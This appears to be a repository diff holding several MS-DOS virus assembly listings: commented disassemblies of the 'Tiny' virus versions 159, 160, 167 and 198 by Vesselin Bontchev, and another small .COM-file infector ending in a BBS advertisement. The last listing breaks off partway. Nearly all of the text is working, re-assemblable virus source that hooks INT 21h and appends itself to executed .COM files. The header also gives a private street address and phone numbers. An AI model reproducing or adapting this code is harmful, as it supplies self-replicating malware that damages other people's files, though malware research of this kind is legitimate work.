; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-159 º
|
||||
; º Disassembled by Vesselin Bontchev, July 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov ax,int_21-first4+seg_60 ; Offset
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
vect_cpy:
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
xchg ax,cx
|
||||
test ax,ax
|
||||
jz vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg bx,ax ; Save the file handle in BX
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov cx,4 ; 4 bytes to read
|
||||
mov dx,seg_60 ; Put them in first4
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov ax,4202 ; Seek to the end of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov ax,4200 ; Seek to the file beginning
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dx,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,178 @@
|
|||
page ,132
|
||||
name TINY160
|
||||
title The 'Tiny' virus, version TINY-160
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-160 º
|
||||
; º Disassembled by Vesselin Bontchev, July 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
mov si,0FF ; Determine the start addres of the virus body
|
||||
add si,[si+2]
|
||||
|
||||
mov di,offset start ; Put the addres of program start on the stack
|
||||
push di ; Now a Near RET instruction will jump there
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
movsw ; Restore the original first 4 bytes
|
||||
movsw
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov cl,2 ; The vector is 2 words long
|
||||
mov ax,int_21-first4+seg_60 ; Offset
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
vect_cpy:
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
mov ax,es ; Segment
|
||||
loop vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
pop ax ; Restore AX
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
|
||||
; Jump to program start via funny RET instruction:
|
||||
|
||||
ret
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg bx,ax ; Save the file handle in BX
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov cx,4 ; 4 bytes to read
|
||||
mov dx,seg_60 ; Put them in first4
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov ax,4202 ; Seek to the end of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov ax,4200 ; Seek to the file beginning
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dx,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the JMP's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,126 @@
|
|||
|
||||
PAGE 59,132
|
||||
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ S ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ Created: 4-Aug-90 ÛÛ
|
||||
;ÛÛ Version: ÛÛ
|
||||
;ÛÛ Passes: 9 Analysis Options on: H ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛ ÛÛ
|
||||
;ÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛÛ
|
||||
|
||||
data_2e equ 1ABh ; (946E:01AB=0)
|
||||
|
||||
seg_a segment byte public
|
||||
assume cs:seg_a, ds:seg_a
|
||||
|
||||
|
||||
org 100h
|
||||
|
||||
s proc far
|
||||
|
||||
start:
|
||||
jmp loc_1 ; (0108)
|
||||
db 0CDh, 20h, 7, 8, 9
|
||||
loc_1:
|
||||
call sub_1 ; (010B)
|
||||
|
||||
s endp
|
||||
|
||||
;ßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßß
|
||||
; SUBROUTINE
|
||||
;ÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜ
|
||||
|
||||
sub_1 proc near
|
||||
pop si
|
||||
sub si,10Bh
|
||||
mov bp,data_1[si] ; (946E:01A0=0)
|
||||
add bp,103h
|
||||
lea dx,[si+1A2h] ; Load effective addr
|
||||
xor cx,cx ; Zero register
|
||||
mov ah,4Eh ; 'N'
|
||||
loc_2:
|
||||
int 21h ; DOS Services ah=function 4Eh
|
||||
; find 1st filenam match @ds:dx
|
||||
jc loc_6 ; Jump if carry Set
|
||||
mov dx,9Eh
|
||||
mov ax,3D02h
|
||||
int 21h ; DOS Services ah=function 3Dh
|
||||
; open file, al=mode,name@ds:dx
|
||||
mov bx,ax
|
||||
mov ah,3Fh ; '?'
|
||||
lea dx,[si+1A8h] ; Load effective addr
|
||||
mov di,dx
|
||||
mov cx,3
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
cmp byte ptr [di],0E9h
|
||||
je loc_4 ; Jump if equal
|
||||
loc_3:
|
||||
mov ah,4Fh ; 'O'
|
||||
jmp short loc_2 ; (0120)
|
||||
loc_4:
|
||||
mov dx,[di+1]
|
||||
mov data_1[si],dx ; (946E:01A0=0)
|
||||
xor cx,cx ; Zero register
|
||||
mov ax,4200h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov dx,di
|
||||
mov cx,2
|
||||
mov ah,3Fh ; '?'
|
||||
int 21h ; DOS Services ah=function 3Fh
|
||||
; read file, cx=bytes, to ds:dx
|
||||
cmp word ptr [di],807h
|
||||
je loc_3 ; Jump if equal
|
||||
xor dx,dx ; Zero register
|
||||
xor cx,cx ; Zero register
|
||||
mov ax,4202h
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
cmp dx,0
|
||||
jne loc_3 ; Jump if not equal
|
||||
cmp ah,0FEh
|
||||
jae loc_3 ; Jump if above or =
|
||||
mov ds:data_2e[si],ax ; (946E:01AB=0)
|
||||
mov ah,40h ; '@'
|
||||
lea dx,[si+105h] ; Load effective addr
|
||||
mov cx,0A3h
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
jc loc_5 ; Jump if carry Set
|
||||
mov ax,4200h
|
||||
xor cx,cx ; Zero register
|
||||
mov dx,1
|
||||
int 21h ; DOS Services ah=function 42h
|
||||
; move file ptr, cx,dx=offset
|
||||
mov ah,40h ; '@'
|
||||
lea dx,[si+1ABh] ; Load effective addr
|
||||
mov cx,2
|
||||
int 21h ; DOS Services ah=function 40h
|
||||
; write file cx=bytes, to ds:dx
|
||||
loc_5:
|
||||
mov ah,3Eh ; '>'
|
||||
int 21h ; DOS Services ah=function 3Eh
|
||||
; close file, bx=file handle
|
||||
loc_6:
|
||||
jmp bp ;*Register jump
|
||||
data_1 dw 0 ; Data table (indexed access)
|
||||
db 2Ah, 2Eh, 43h, 4Fh, 4Dh, 0
|
||||
sub_1 endp
|
||||
|
||||
|
||||
seg_a ends
|
||||
|
||||
|
||||
|
||||
end start
|
||||
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
|
||||
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
|
||||
|
|
@ -0,0 +1,177 @@
|
|||
page ,132
|
||||
name TINY167
|
||||
title The 'Tiny' virus, version TINY-167
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-167 º
|
||||
; º Disassembled by Vesselin Bontchev, July 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-first4
|
||||
|
||||
start:
|
||||
call v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
v_entry:
|
||||
pop si ; Determine the start addres of the virus body
|
||||
add si,[si-2]
|
||||
|
||||
; Save the original first 4 bytes of the infected file on the stack:
|
||||
|
||||
push word ptr ds:[si-4]
|
||||
push word ptr ds:[si-2]
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
mov di,seg_60+4 ; Point ES:DI at 0000:0604h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len-2 ; CX := virus length
|
||||
lodsw ; Check if virus is present in memory
|
||||
scasw
|
||||
je run ; Just run the program if so
|
||||
|
||||
; Virus not in memory. Install it there:
|
||||
|
||||
dec di ; Adjust DI
|
||||
dec di
|
||||
stosw ; Store the first word of the virus body
|
||||
rep movsb ; Store the rest of the virus
|
||||
|
||||
mov di,32*4 ; Old INT 21h handler will be moved to INT 32h
|
||||
mov cl,2 ; The vector is 2 words long
|
||||
mov ax,int_21-first4+seg_60 ; Offset
|
||||
|
||||
; Move the INT 21h handler to INT 32h and
|
||||
; install int_21 as new INT 21h handler:
|
||||
|
||||
vect_cpy:
|
||||
xchg ax,word ptr es:[di-(32-21)*4]
|
||||
stosw
|
||||
mov ax,es ; Segment
|
||||
loop vect_cpy ; Loop until done
|
||||
|
||||
run:
|
||||
mov di,offset start ; Point DI at program start
|
||||
pop ax ; Restore AX
|
||||
pop word ptr ds:[di+2] ; Restore the original first 4 bytes
|
||||
pop word ptr ds:[di] ; of the file
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
jmp di ; Go
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
xchg bx,ax ; Save the file handle in BX
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov cx,4 ; 4 bytes to read
|
||||
mov dx,seg_60 ; Put them in first4
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov ax,4202 ; Seek to the end of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov ax,4200 ; Seek to the file beginning
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dx,di ; Point DX at first4
|
||||
mov al,0E8 ; Near CALL opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
inc ax
|
||||
stosw ; Form the CALL's opperand
|
||||
mov al,'M' ; Add a `M' character to mark the file
|
||||
stosb ; as infected
|
||||
|
||||
mov cl,4 ; Overwrite the first 4 bytes of the file
|
||||
mov ah,40
|
||||
int 32 ; Do it
|
||||
|
||||
close:
|
||||
mov ah,3E ; Close the file
|
||||
int 32
|
||||
|
||||
end_exec:
|
||||
pop es ; Restore used registers
|
||||
pop ds
|
||||
pop di
|
||||
pop dx
|
||||
pop cx
|
||||
pop bx
|
||||
pop ax
|
||||
|
||||
; Exit through the original INT 21h handler:
|
||||
|
||||
end_21:
|
||||
jmp dword ptr cs:[32*4]
|
||||
|
||||
v_end equ $ ; End of virus body
|
||||
|
||||
code ends
|
||||
end start
|
||||
|
|
@ -0,0 +1,199 @@
|
|||
page ,132
|
||||
name TINY198
|
||||
title The 'Tiny' virus, version TINY-198
|
||||
.radix 16
|
||||
|
||||
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
|
||||
; º Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 º
|
||||
; º Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 º
|
||||
; º º
|
||||
; º The 'Tiny' Virus, version TINY-198 º
|
||||
; º Disassembled by Vesselin Bontchev, July 1990 º
|
||||
; º º
|
||||
; º Copyright (c) Vesselin Bontchev 1989, 1990 º
|
||||
; º º
|
||||
; º This listing is only to be made available to virus researchers º
|
||||
; º or software writers on a need-to-know basis. º
|
||||
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
|
||||
|
||||
; The disassembly has been tested by re-assembly using MASM 5.0.
|
||||
|
||||
code segment
|
||||
assume cs:code, ds:code
|
||||
|
||||
org 100
|
||||
|
||||
seg_60 equ 600
|
||||
v_len equ v_end-v_entry
|
||||
|
||||
start:
|
||||
jmp v_entry ; Jump to virus code
|
||||
db 'M' ; Virus signature
|
||||
mov ax,4C00 ; Program terminate
|
||||
int 21
|
||||
|
||||
v_entry:
|
||||
call self ; Determine the start addres of the virus body
|
||||
self:
|
||||
pop si
|
||||
sub si,3
|
||||
|
||||
push ax ; Save AX (to keep programs as DISKCOPY happy)
|
||||
|
||||
; Check whether the virus is already in memory and just run the program if so:
|
||||
|
||||
mov ah,0E9
|
||||
int 21
|
||||
|
||||
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
|
||||
xor cx,cx ; ES := 0
|
||||
mov es,cx
|
||||
mov cl,v_len ; CX := virus length
|
||||
rep movsb ; Move the virus body there
|
||||
|
||||
; Transfer control to cont: by PUSHing its address
|
||||
; on the stack and executing RETF:
|
||||
|
||||
push es
|
||||
mov ax,cont-v_entry+seg_60
|
||||
push ax
|
||||
retf
|
||||
|
||||
; The original first 4 bytes of the infected file:
|
||||
|
||||
first4 db 0EBh, 2, 90, 90
|
||||
|
||||
; Resume execution from here (but already in segment 60h):
|
||||
|
||||
cont:
|
||||
|
||||
; Install new INT 21h handler and move the old one at INT 32h:
|
||||
|
||||
mov di,21*4
|
||||
mov cl,2
|
||||
mov ax,int_21-v_entry+seg_60
|
||||
cld
|
||||
lp:
|
||||
push word ptr es:[di] ; Get old handler's address
|
||||
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
|
||||
stosw ; Install the new one
|
||||
mov ax,cs
|
||||
loop lp ; Loop until done
|
||||
|
||||
; Save the original first 4 bytes of the infected program on the stack:
|
||||
|
||||
push word ptr cs:[first4-v_entry+seg_60]
|
||||
push word ptr cs:[first4+2-v_entry+seg_60]
|
||||
|
||||
run_pgm:
|
||||
mov di,offset start ; Point DI at program's start
|
||||
pop word ptr [di+2] ; Restore the first 4 bytes of the program
|
||||
pop word ptr [di]
|
||||
pop ax ; Restore the original value of AX
|
||||
push ds
|
||||
push ds ; ES := DS
|
||||
pop es
|
||||
push di ; Push 100h on the stack
|
||||
retf
|
||||
|
||||
mem_chk:
|
||||
|
||||
; Push the original first 4 bytes of the infected program on the stack:
|
||||
|
||||
push word ptr [si+first4-v_entry]
|
||||
push word ptr [si+first4+2-v_entry]
|
||||
jmp run_pgm ; And run the original program
|
||||
|
||||
int_21: ; New INT 21h handler
|
||||
cmp ah,0E9 ; Memory check?
|
||||
je mem_chk ; If infected, run the original program
|
||||
cmp ax,4B00 ; EXEC function call?
|
||||
jne end_21 ; Exit if not
|
||||
|
||||
push ax ; Save registers used
|
||||
push bx
|
||||
push cx
|
||||
push dx
|
||||
push di
|
||||
push ds
|
||||
push es
|
||||
|
||||
push cs ; ES := CS
|
||||
pop es
|
||||
|
||||
mov ax,3D02 ; Open the file for both reading and writting
|
||||
int 32
|
||||
jc end_exec ; Exit on error
|
||||
mov bx,ax ; Save the file handle in BX
|
||||
|
||||
mov ah,3F ; Read the first 4 bytes of the file
|
||||
mov cx,4 ; 4 bytes to read
|
||||
mov dx,first4-v_entry+seg_60 ; Put them in first4
|
||||
mov di,dx ; Save first4 address in DI
|
||||
push cs ; DS := CS
|
||||
pop ds
|
||||
int 32 ; Do it
|
||||
|
||||
; Check whether the file is already infected or is an .EXE file.
|
||||
; The former contains the character `M' in its 3rd byte and
|
||||
; the latter contains it either in the 0th or in the 1st byte.
|
||||
|
||||
push di ; Save DI
|
||||
mov al,'M' ; Look for `M'
|
||||
repne scasb
|
||||
pop di ; Restore DI
|
||||
je close ; Exit if file not suitable for infection
|
||||
|
||||
mov ax,4202 ; Seek to the end of file
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
push ax ; Save file length
|
||||
|
||||
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
|
||||
mov cl,v_len ; Length of virus body
|
||||
mov ah,40 ; Append virus to file
|
||||
int 32 ; Do it
|
||||
|
||||
mov ax,4200 ; Seek to the file beginning
|
||||
xor cx,cx
|
||||
xor dx,dx
|
||||
int 32 ; Do it
|
||||
|
||||
mov dx,di ; Point DX at first4
|
||||
mov al,0E9 ; Near JMP opcode
|
||||
stosb ; Form the first instruction of the file
|
||||
pop ax ; Restore file length in AX
|
||||
sub ax,3 ; Subtract 3 (first instruction length)
|
||||
